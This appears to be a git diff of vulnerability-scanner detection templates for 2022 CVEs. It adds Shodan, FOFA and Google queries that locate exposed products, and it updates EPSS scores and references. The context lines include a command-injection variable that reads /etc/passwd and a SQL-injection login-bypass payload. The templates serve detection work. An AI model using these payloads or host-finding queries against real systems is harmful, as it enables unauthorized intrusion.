b/http/cves/2022/CVE-2022-29272.yaml @@ -28,6 +28,9 @@ info: max-request: 2 vendor: nagios product: nagios_xi + shodan-query: http.title:"nagios xi" + fofa-query: title="nagios xi" + google-query: intitle:"nagios xi" tags: cve,cve2022,redirect,nagios,nagiosxi http: diff --git a/http/cves/2022/CVE-2022-29298.yaml b/http/cves/2022/CVE-2022-29298.yaml index 38ffe1f6b1..b4868355be 100644 --- a/http/cves/2022/CVE-2022-29298.yaml +++ b/http/cves/2022/CVE-2022-29298.yaml @@ -29,6 +29,7 @@ info: vendor: contec product: sv-cpt-mc310_firmware shodan-query: http.html:"SolarView Compact" + fofa-query: body="solarview compact" tags: cve,cve2022,lfi,solarview,edb,contec http: diff --git a/http/cves/2022/CVE-2022-29303.yaml b/http/cves/2022/CVE-2022-29303.yaml index 3f9b0f07ff..a4ab37242f 100644 --- a/http/cves/2022/CVE-2022-29303.yaml +++ b/http/cves/2022/CVE-2022-29303.yaml @@ -30,6 +30,7 @@ info: vendor: contec product: sv-cpt-mc310_firmware shodan-query: http.html:"SolarView Compact" + fofa-query: body="solarview compact" tags: cve,cve2022,injection,solarview,edb,packetstorm,rce,kev,contec variables: cmd: "cat${IFS}/etc/passwd" diff --git a/http/cves/2022/CVE-2022-29349.yaml b/http/cves/2022/CVE-2022-29349.yaml index 1487e16bc8..e79c758f4d 100644 --- a/http/cves/2022/CVE-2022-29349.yaml +++ b/http/cves/2022/CVE-2022-29349.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-29349 cwe-id: CWE-79 - epss-score: 0.01698 - epss-percentile: 0.86444 + epss-score: 0.00314 + epss-percentile: 0.70155 cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: keking product: kkfileview shodan-query: http.html:"kkFileView" + fofa-query: body="kkfileview" tags: cve,cve2022,kkFileView,xss,keking http: diff --git a/http/cves/2022/CVE-2022-29464.yaml b/http/cves/2022/CVE-2022-29464.yaml index be282d3374..5ba976405e 100644 --- a/http/cves/2022/CVE-2022-29464.yaml +++ b/http/cves/2022/CVE-2022-29464.yaml @@ -29,6 +29,8 @@ info: vendor: wso2 product: api_manager shodan-query: http.favicon.hash:1398055326 + fofa-query: icon_hash=1398055326 + google-query: inurl:"carbon/admin/login" tags: cve,cve2022,rce,fileupload,wso2,intrusive,kev http: diff --git a/http/cves/2022/CVE-2022-29548.yaml b/http/cves/2022/CVE-2022-29548.yaml index 5cdf4a3d75..a53b6d6ba5 100644 --- a/http/cves/2022/CVE-2022-29548.yaml +++ b/http/cves/2022/CVE-2022-29548.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-29548 cwe-id: CWE-79 - epss-score: 0.00299 - epss-percentile: 0.68867 + epss-score: 0.01348 + epss-percentile: 0.86109 cpe: cpe:2.3:a:wso2:api_manager:2.2.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: wso2 product: api_manager google-query: inurl:"carbon/admin/login" + shodan-query: http.favicon.hash:1398055326 + fofa-query: icon_hash=1398055326 tags: cve,cve2022,wso2,xss,packetstorm http: diff --git a/http/cves/2022/CVE-2022-29775.yaml b/http/cves/2022/CVE-2022-29775.yaml index 8318ab5924..331b043b0a 100644 --- a/http/cves/2022/CVE-2022-29775.yaml +++ b/http/cves/2022/CVE-2022-29775.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29775 cwe-id: CWE-287 - epss-score: 0.01088 - epss-percentile: 0.82745 + epss-score: 0.01197 + epss-percentile: 0.85119 cpe: cpe:2.3:a:ispyconnect:ispy:7.2.2.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: ispyconnect product: ispy shodan-query: http.html:"iSpy is running" + fofa-query: body="ispy is running" tags: cve,cve2022,ispy,auth-bypass,ispyconnect http: diff --git a/http/cves/2022/CVE-2022-30073.yaml b/http/cves/2022/CVE-2022-30073.yaml index 8e51358733..e87dff8fb3 100644 --- a/http/cves/2022/CVE-2022-30073.yaml +++ b/http/cves/2022/CVE-2022-30073.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-30073 cwe-id: CWE-79 epss-score: 0.00205 - epss-percentile: 0.57793 + epss-percentile: 0.5842 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30489.yaml b/http/cves/2022/CVE-2022-30489.yaml index fa8e443a15..42de1b227b 100644 --- a/http/cves/2022/CVE-2022-30489.yaml +++ b/http/cves/2022/CVE-2022-30489.yaml @@ -14,13 +14,15 @@ info: - https://github.com/badboycxcc/XSS-CVE-2022-30489 - https://github.com/badboycxcc/XSS - https://nvd.nist.gov/vuln/detail/CVE-2022-30489 + - https://github.com/trhacknon/Pocingit + - https://github.com/trhacknon/XSS-CVE-2022-30489 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-30489 cwe-id: CWE-79 - epss-score: 0.00088 - epss-percentile: 0.36947 + epss-score: 0.00102 + epss-percentile: 0.41641 cpe: cpe:2.3:o:wavlink:wn535g3_firmware:-:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +30,8 @@ info: vendor: wavlink product: wn535g3_firmware shodan-query: http.title:"Wi-Fi APP Login" + fofa-query: title="wi-fi app login" + google-query: intitle:"wi-fi app login" tags: cve,cve2022,xss,wavlink,router,iot http: diff --git a/http/cves/2022/CVE-2022-30512.yaml b/http/cves/2022/CVE-2022-30512.yaml index e98b12e9d8..60a6709c6f 100644 --- a/http/cves/2022/CVE-2022-30512.yaml +++ b/http/cves/2022/CVE-2022-30512.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-30512 cwe-id: CWE-89 - epss-score: 0.02624 - epss-percentile: 0.89288 + epss-score: 0.11597 + epss-percentile: 0.9526 cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30513.yaml b/http/cves/2022/CVE-2022-30513.yaml index d744e95727..1e65f7cf2a 100644 --- a/http/cves/2022/CVE-2022-30513.yaml +++ b/http/cves/2022/CVE-2022-30513.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-30513 cwe-id: CWE-79 - epss-score: 0.00097 - epss-percentile: 0.39401 + epss-score: 0.00112 + epss-percentile: 0.44481 cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30525.yaml b/http/cves/2022/CVE-2022-30525.yaml index 4e8a29bb38..bccd71b102 100644 --- a/http/cves/2022/CVE-2022-30525.yaml +++ b/http/cves/2022/CVE-2022-30525.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-30525 cwe-id: CWE-78 - epss-score: 0.97482 - epss-percentile: 0.99967 + epss-score: 0.97472 + epss-percentile: 0.99965 cpe: cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-3062.yaml b/http/cves/2022/CVE-2022-3062.yaml index f00e70105b..17be50d07e 100644 --- a/http/cves/2022/CVE-2022-3062.yaml +++ b/http/cves/2022/CVE-2022-3062.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-3062 cwe-id: CWE-79 - epss-score: 0.0012 - epss-percentile: 0.46075 + epss-score: 0.00106 + epss-percentile: 0.43227 cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30776.yaml b/http/cves/2022/CVE-2022-30776.yaml index f912a8432c..be13eda8b4 100644 --- a/http/cves/2022/CVE-2022-30776.yaml +++ b/http/cves/2022/CVE-2022-30776.yaml @@ -30,6 +30,7 @@ info: vendor: atmail product: atmail shodan-query: http.html:"atmail" + fofa-query: body="powered by atmail" tags: cve2022,cve,atmail,xss http: diff --git a/http/cves/2022/CVE-2022-30777.yaml b/http/cves/2022/CVE-2022-30777.yaml index d36995911c..0d7912c735 100644 --- a/http/cves/2022/CVE-2022-30777.yaml +++ b/http/cves/2022/CVE-2022-30777.yaml @@ -15,13 +15,14 @@ info: - https://en.wikipedia.org/wiki/H-Sphere - https://nvd.nist.gov/vuln/detail/CVE-2022-30777 - https://medium.com/%40bhattronit96/cve-2022-30777-45725763ab59 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-30777 cwe-id: CWE-79 epss-score: 0.00087 - epss-percentile: 0.36061 + epss-percentile: 0.36791 cpe: cpe:2.3:a:parallels:h-sphere:3.6.2:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +30,8 @@ info: vendor: parallels product: h-sphere shodan-query: title:"h-sphere" + fofa-query: title="h-sphere" + google-query: intitle:"h-sphere" tags: cve,cve2022,parallels,hsphere,xss http: diff --git a/http/cves/2022/CVE-2022-31126.yaml b/http/cves/2022/CVE-2022-31126.yaml index b411693f94..4c28485bfe 100644 --- a/http/cves/2022/CVE-2022-31126.yaml +++ b/http/cves/2022/CVE-2022-31126.yaml @@ -29,6 +29,7 @@ info: vendor: roxy-wi product: roxy-wi shodan-query: http.html:"Roxy-WI" + fofa-query: body="roxy-wi" tags: cve2022,cve,rce,unauth,roxy,packetstorm,roxy-wi http: diff --git a/http/cves/2022/CVE-2022-31268.yaml b/http/cves/2022/CVE-2022-31268.yaml index 061d0ca131..bb46253f20 100644 --- a/http/cves/2022/CVE-2022-31268.yaml +++ b/http/cves/2022/CVE-2022-31268.yaml @@ -30,6 +30,8 @@ info: vendor: gitblit product: gitblit shodan-query: http.html:"Gitblit" + fofa-query: title="gitblit" + google-query: intitle:"gitblit" tags: cve,cve2022,lfi,gitblit http: diff --git a/http/cves/2022/CVE-2022-31269.yaml b/http/cves/2022/CVE-2022-31269.yaml index 5c4f56238d..e3a3702a31 100644 --- a/http/cves/2022/CVE-2022-31269.yaml +++ b/http/cves/2022/CVE-2022-31269.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.2 cve-id: CVE-2022-31269 cwe-id: CWE-798 - epss-score: 0.00231 - epss-percentile: 0.6049 + epss-score: 0.00284 + epss-percentile: 0.68595 cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: nortekcontrol product: emerge_e3_firmware shodan-query: http.title:"Linear eMerge" + fofa-query: title="emerge" + google-query: intitle:"linear emerge" tags: cve,cve2022,emerge,exposure,packetstorm,nortekcontrol http: diff --git a/http/cves/2022/CVE-2022-31373.yaml b/http/cves/2022/CVE-2022-31373.yaml index 9cd6fdedb7..37e7f0d9d4 100644 --- a/http/cves/2022/CVE-2022-31373.yaml +++ b/http/cves/2022/CVE-2022-31373.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-31373 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36353 + epss-percentile: 0.37623 cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: contec product: sv-cpt-mc310_firmware shodan-query: http.html:"SolarView Compact" + fofa-query: body="solarview compact" tags: cve2022,cve,xss,solarview,contec http: diff --git a/http/cves/2022/CVE-2022-3142.yaml b/http/cves/2022/CVE-2022-3142.yaml index 32a47a3e0f..90ee57503b 100644 --- a/http/cves/2022/CVE-2022-3142.yaml +++ b/http/cves/2022/CVE-2022-3142.yaml @@ -28,6 +28,8 @@ info: product: nex-forms framework: wordpress publicwww-query: /wp-content/plugins/nex-forms-express-wp-form-builder/ + shodan-query: http.html:/wp-content/plugins/nex-forms-express-wp-form-builder/ + fofa-query: body=/wp-content/plugins/nex-forms-express-wp-form-builder/ tags: cve,cve2022,wpscan,packetstorm,wordpress,sqli,wp-plugin,wp,authenticated,basixonline http: diff --git a/http/cves/2022/CVE-2022-31499.yaml b/http/cves/2022/CVE-2022-31499.yaml index b2a74b78ba..b4535f5091 100644 --- a/http/cves/2022/CVE-2022-31499.yaml +++ b/http/cves/2022/CVE-2022-31499.yaml @@ -30,6 +30,8 @@ info: vendor: nortekcontrol product: emerge_e3_firmware shodan-query: title:"eMerge" + fofa-query: title="emerge" + google-query: intitle:"linear emerge" tags: cve,cve2022,packetstorm,emerge,rce,nortekcontrol http: diff --git a/http/cves/2022/CVE-2022-31656.yaml b/http/cves/2022/CVE-2022-31656.yaml index f77ae5c7be..0fb55b42d8 100644 --- a/http/cves/2022/CVE-2022-31656.yaml +++ b/http/cves/2022/CVE-2022-31656.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31656 cwe-id: CWE-287 - epss-score: 0.75034 - epss-percentile: 0.98069 + epss-score: 0.64132 + epss-percentile: 0.97874 cpe: cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: vmware product: identity_manager shodan-query: http.favicon.hash:-1250474341 + fofa-query: icon_hash=-1250474341 tags: cve2022,cve,vmware,lfi http: diff --git a/http/cves/2022/CVE-2022-31798.yaml b/http/cves/2022/CVE-2022-31798.yaml index 63e878830a..6da156ed2b 100644 --- a/http/cves/2022/CVE-2022-31798.yaml +++ b/http/cves/2022/CVE-2022-31798.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-31798 cwe-id: CWE-384 epss-score: 0.00126 - epss-percentile: 0.46259 + epss-percentile: 0.47221 cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: nortekcontrol product: emerge_e3_firmware shodan-query: http.title:"eMerge" + fofa-query: title="emerge" + google-query: intitle:"linear emerge" tags: cve2022,cve,emerge,nortek,xss,packetstorm,nortekcontrol http: diff --git a/http/cves/2022/CVE-2022-31814.yaml b/http/cves/2022/CVE-2022-31814.yaml index 4b923edec0..ba09e64ef6 100644 --- a/http/cves/2022/CVE-2022-31814.yaml +++ b/http/cves/2022/CVE-2022-31814.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31814 cwe-id: CWE-78 - epss-score: 0.96552 - epss-percentile: 0.9952 + epss-score: 0.97252 + epss-percentile: 0.99847 cpe: cpe:2.3:a:netgate:pfblockerng:*:*:*:*:*:pfsense:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31845.yaml b/http/cves/2022/CVE-2022-31845.yaml index 332d5df030..a0a73f46e6 100644 --- a/http/cves/2022/CVE-2022-31845.yaml +++ b/http/cves/2022/CVE-2022-31845.yaml @@ -28,6 +28,8 @@ info: vendor: wavlink product: wn535g3_firmware shodan-query: http.html:"Wavlink" + fofa-query: title="wi-fi app login" + google-query: intitle:"wi-fi app login" tags: cve,cve2022,wavlink,exposure http: diff --git a/http/cves/2022/CVE-2022-31846.yaml b/http/cves/2022/CVE-2022-31846.yaml index fa1dde8f5b..35cedf4b58 100644 --- a/http/cves/2022/CVE-2022-31846.yaml +++ b/http/cves/2022/CVE-2022-31846.yaml @@ -30,6 +30,8 @@ info: vendor: wavlink product: wn535g3_firmware shodan-query: http.html:"Wavlink" + fofa-query: title="wi-fi app login" + google-query: intitle:"wi-fi app login" tags: cve,cve2022,wavlink,exposure http: diff --git a/http/cves/2022/CVE-2022-31847.yaml b/http/cves/2022/CVE-2022-31847.yaml index 145a1dea6d..b97b3dc4a2 100644 --- a/http/cves/2022/CVE-2022-31847.yaml +++ b/http/cves/2022/CVE-2022-31847.yaml @@ -13,13 +13,15 @@ info: reference: - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN579%20X3__Sensitive%20information%20leakage.md - https://nvd.nist.gov/vuln/detail/CVE-2022-31847 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-31847 cwe-id: CWE-425 - epss-score: 0.01285 - epss-percentile: 0.84308 + epss-score: 0.01275 + epss-percentile: 0.85693 cpe: cpe:2.3:o:wavlink:wn579x3_firmware:m79x3.v5030.180719:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +29,7 @@ info: vendor: wavlink product: wn579x3_firmware shodan-query: http.html:"Wavlink" + fofa-query: body="wavlink" tags: cve,cve2022,wavlink,exposure http: diff --git a/http/cves/2022/CVE-2022-31854.yaml b/http/cves/2022/CVE-2022-31854.yaml index bbee69b1c5..6ca41201a2 100644 --- a/http/cves/2022/CVE-2022-31854.yaml +++ b/http/cves/2022/CVE-2022-31854.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31854 cwe-id: CWE-434 - epss-score: 0.17108 - epss-percentile: 0.95958 + epss-score: 0.26245 + epss-percentile: 0.96727 cpe: cpe:2.3:a:codologic:codoforum:5.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31879.yaml b/http/cves/2022/CVE-2022-31879.yaml index f475a1cadb..182a1275bf 100644 --- a/http/cves/2022/CVE-2022-31879.yaml +++ b/http/cves/2022/CVE-2022-31879.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-31879 cwe-id: CWE-89 - epss-score: 0.05519 - epss-percentile: 0.9247 + epss-score: 0.05371 + epss-percentile: 0.93099 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-31976.yaml b/http/cves/2022/CVE-2022-31976.yaml index d35e7b48bc..27911724e1 100644 --- a/http/cves/2022/CVE-2022-31976.yaml +++ b/http/cves/2022/CVE-2022-31976.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31976 cwe-id: CWE-89 - epss-score: 0.02036 - epss-percentile: 0.87769 + epss-score: 0.02266 + epss-percentile: 0.89602 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31977.yaml b/http/cves/2022/CVE-2022-31977.yaml index f1d882f18c..500501c96a 100644 --- a/http/cves/2022/CVE-2022-31977.yaml +++ b/http/cves/2022/CVE-2022-31977.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-31977 cwe-id: CWE-89 - epss-score: 0.01192 - epss-percentile: 0.83594 + epss-score: 0.02266 + epss-percentile: 0.89602 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31981.yaml b/http/cves/2022/CVE-2022-31981.yaml index 63697be4ed..2b627f8a44 100644 --- a/http/cves/2022/CVE-2022-31981.yaml +++ b/http/cves/2022/CVE-2022-31981.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31981 cwe-id: CWE-89 - epss-score: 0.01426 - epss-percentile: 0.8625 + epss-score: 0.01593 + epss-percentile: 0.87356 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31983.yaml b/http/cves/2022/CVE-2022-31983.yaml index d7d9c8d698..37e248af3b 100644 --- a/http/cves/2022/CVE-2022-31983.yaml +++ b/http/cves/2022/CVE-2022-31983.yaml @@ -14,13 +14,15 @@ info: - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-9.md - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html - https://nvd.nist.gov/vuln/detail/CVE-2022-31983 + - https://github.com/nomi-sec/PoC-in-GitHub + - https://github.com/trhacknon/Pocingit classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2022-31983 cwe-id: CWE-89 - epss-score: 0.00834 - epss-percentile: 0.80157 + epss-score: 0.13959 + epss-percentile: 0.95665 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-31984.yaml b/http/cves/2022/CVE-2022-31984.yaml index 301514c200..a4aa7c052e 100644 --- a/http/cves/2022/CVE-2022-31984.yaml +++ b/http/cves/2022/CVE-2022-31984.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-31984 cwe-id: CWE-89 - epss-score: 0.01426 - epss-percentile: 0.8625 + epss-score: 0.01593 + epss-percentile: 0.87356 cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-32015.yaml b/http/cves/2022/CVE-2022-32015.yaml index 3fff028ab9..2a6425936c 100644 --- a/http/cves/2022/CVE-2022-32015.yaml +++ b/http/cves/2022/CVE-2022-32015.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32015 cwe-id: CWE-89 - epss-score: 0.01426 - epss-percentile: 0.8625 + epss-score: 0.01593 + epss-percentile: 0.87356 cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32018.yaml b/http/cves/2022/CVE-2022-32018.yaml index 03f4f75f3c..5ec3f75e1f 100644 --- a/http/cves/2022/CVE-2022-32018.yaml +++ b/http/cves/2022/CVE-2022-32018.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.2 cve-id: CVE-2022-32018 cwe-id: CWE-89 - epss-score: 0.01426 - epss-percentile: 0.8625 + epss-score: 0.01593 + epss-percentile: 0.87356 cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32022.yaml b/http/cves/2022/CVE-2022-32022.yaml index 63f2d90739..ded26d3ae3 100644 --- a/http/cves/2022/CVE-2022-32022.yaml +++ b/http/cves/2022/CVE-2022-32022.yaml @@ -28,6 +28,7 @@ info: vendor: car_rental_management_system_project product: car_rental_management_system shodan-query: http.html:"Car Rental Management System" + fofa-query: body="car rental management system" tags: cve,cve2022,carrental,cms,sqli,login-bypass,car_rental_management_system_project http: diff --git a/http/cves/2022/CVE-2022-32024.yaml b/http/cves/2022/CVE-2022-32024.yaml index 316fc83d33..fc46e42229 100644 --- a/http/cves/2022/CVE-2022-32024.yaml +++ b/http/cves/2022/CVE-2022-32024.yaml @@ -28,6 +28,7 @@ info: product: car_rental_management_system shodan-query: http.html:"Car Rental Management System" comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. + fofa-query: body="car rental management system" tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32025.yaml b/http/cves/2022/CVE-2022-32025.yaml index 14765055c5..578029f2fa 100644 --- a/http/cves/2022/CVE-2022-32025.yaml +++ b/http/cves/2022/CVE-2022-32025.yaml @@ -29,6 +29,7 @@ info: product: car_rental_management_system shodan-query: http.html:"Car Rental Management System" comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. + fofa-query: body="car rental management system" tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32026.yaml b/http/cves/2022/CVE-2022-32026.yaml index d770372ee9..defbacfc5e 100644 --- a/http/cves/2022/CVE-2022-32026.yaml +++ b/http/cves/2022/CVE-2022-32026.yaml @@ -30,6 +30,7 @@ info: product: car_rental_management_system shodan-query: http.html:"Car Rental Management System" comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. + fofa-query: body="car rental management system" tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32028.yaml b/http/cves/2022/CVE-2022-32028.yaml index bd9a8b794a..0abfa87623 100644 --- a/http/cves/2022/CVE-2022-32028.yaml +++ b/http/cves/2022/CVE-2022-32028.yaml @@ -29,6 +29,7 @@ info: product: car_rental_management_system shodan-query: http.html:"Car Rental Management System" comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. + fofa-query: body="car rental management system" tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32094.yaml b/http/cves/2022/CVE-2022-32094.yaml index 43fd7e005e..38aa8ee5c5 100644 --- a/http/cves/2022/CVE-2022-32094.yaml +++ b/http/cves/2022/CVE-2022-32094.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-32094 cwe-id: CWE-89 - epss-score: 0.01192 - epss-percentile: 0.83651 + epss-score: 0.02031 + epss-percentile: 0.88909 cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: hospital_management_system_project product: hospital_management_system shodan-query: http.html:"Hospital Management System" + fofa-query: body="hospital management system" tags: cve,cve2022,hms,cms,sqli,auth-bypass,hospital_management_system_project http: diff --git a/http/cves/2022/CVE-2022-32195.yaml b/http/cves/2022/CVE-2022-32195.yaml index a06e93bdc7..60b8b5b9f5 100644 --- a/http/cves/2022/CVE-2022-32195.yaml +++ b/http/cves/2022/CVE-2022-32195.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-32195 cwe-id: CWE-79 epss-score: 0.00112 - epss-percentile: 0.43735 + epss-percentile: 0.44633 cpe: cpe:2.3:a:edx:open_edx:*:*:*:*:*:*:*:* metadata: verified: true @@ -31,6 +31,7 @@ info: product: open_edx shodan-query: http.html:"Open edX" comment: Hover the cursor on the redirect link + fofa-query: body="open edx" tags: cve,cve2022,openedx,xss,edx http: diff --git a/http/cves/2022/CVE-2022-32409.yaml b/http/cves/2022/CVE-2022-32409.yaml index 970cc96d0e..48846eef9c 100644 --- a/http/cves/2022/CVE-2022-32409.yaml +++ b/http/cves/2022/CVE-2022-32409.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-32409 cwe-id: CWE-22 epss-score: 0.47251 - epss-percentile: 0.97372 + epss-percentile: 0.97452 cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: softwarepublico product: i3geo shodan-query: http.html:"i3geo" + fofa-query: body="i3geo" tags: cve2022,cve,i3geo,lfi,softwarepublico http: diff --git a/http/cves/2022/CVE-2022-3242.yaml b/http/cves/2022/CVE-2022-3242.yaml index ab1b488535..4705c7210a 100644 --- a/http/cves/2022/CVE-2022-3242.yaml +++ b/http/cves/2022/CVE-2022-3242.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-3242 cwe-id: CWE-79,CWE-94 - epss-score: 0.024 - epss-percentile: 0.8882 + epss-score: 0.02135 + epss-percentile: 0.89247 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true @@ -25,6 +25,7 @@ info: vendor: microweber product: microweber shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve,cve2022,huntr,xss,microweber http: diff --git a/http/cves/2022/CVE-2022-32429.yaml b/http/cves/2022/CVE-2022-32429.yaml index f946f1268c..d775902a68 100644 --- a/http/cves/2022/CVE-2022-32429.yaml +++ b/http/cves/2022/CVE-2022-32429.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-32429 cwe-id: CWE-287 - epss-score: 0.15342 - epss-percentile: 0.95742 + epss-score: 0.16163 + epss-percentile: 0.95978 cpe: cpe:2.3:o:megatech:msnswitch_firmware:mnt.2408:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-32430.yaml b/http/cves/2022/CVE-2022-32430.yaml index 98550c804a..2fc11ed28c 100644 --- a/http/cves/2022/CVE-2022-32430.yaml +++ b/http/cves/2022/CVE-2022-32430.yaml @@ -23,6 +23,7 @@ info: vendor: talelin product: lin-cms-spring-boot fofa-query: body="心上无垢,林间有风" + shodan-query: http.html:"心上无垢,林间有风" tags: cve,cve2022,lin-cms,auth-bypass http: diff --git a/http/cves/2022/CVE-2022-32444.yaml b/http/cves/2022/CVE-2022-32444.yaml index c253fd2076..0beea4ffc1 100644 --- a/http/cves/2022/CVE-2022-32444.yaml +++ b/http/cves/2022/CVE-2022-32444.yaml @@ -13,13 +13,15 @@ info: reference: - https://github.com/u5cms/u5cms/issues/50 - https://nvd.nist.gov/vuln/detail/CVE-2022-32444 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Sharpforce/cybersecurity classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-32444 cwe-id: CWE-601 